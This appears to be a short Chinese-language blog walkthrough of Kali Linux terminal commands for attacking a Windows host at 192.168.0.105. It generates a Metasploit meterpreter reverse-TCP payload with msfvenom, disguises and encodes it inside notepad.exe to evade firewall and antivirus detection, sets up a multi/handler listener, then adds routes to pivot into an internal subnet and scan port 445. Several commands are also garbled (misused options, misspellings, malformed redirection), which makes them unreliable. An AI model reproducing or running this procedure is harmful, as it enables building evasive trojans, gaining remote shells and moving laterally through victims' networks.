root@kali:~# ping 192.168.0.105
root@kali:~# nmap -sV 192.168.0.105
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp rhosts=192.168.0.105 rport=135 -f exe > -o /setup.exe
绕过防火墙杀毒软件检测:
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp rhosts=192.168.0.105 rport=135 -x.notepad.exe -e x64/jmp_call_additive -i 4 -k -f exe> setup.exe
root@kali:~# msfconsole
msf5 > use exploit/multi/handler
msf5 expolit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 expolit(multi/handler) > set rhosts 192.168.0.105
msf5 expolit(multi/handler) > set rport 6666
msf5 expolit(multi/handler) > options
msf5 expolit(multi/handler) > info
msf5 expolit(multi/handler) > expolit
获取当前路由内网信息:
meterpreter > run get_local_subnets
添加路由:
meterpreter > run autoroute -s 192.168.3.0/24
查看已添加路由:
meterpreter > run autoroute -p
切换后台进行:
meterpreter > background
扫描开放的445端口:
meterpreter > use scanner/portscan/tcp
网友评论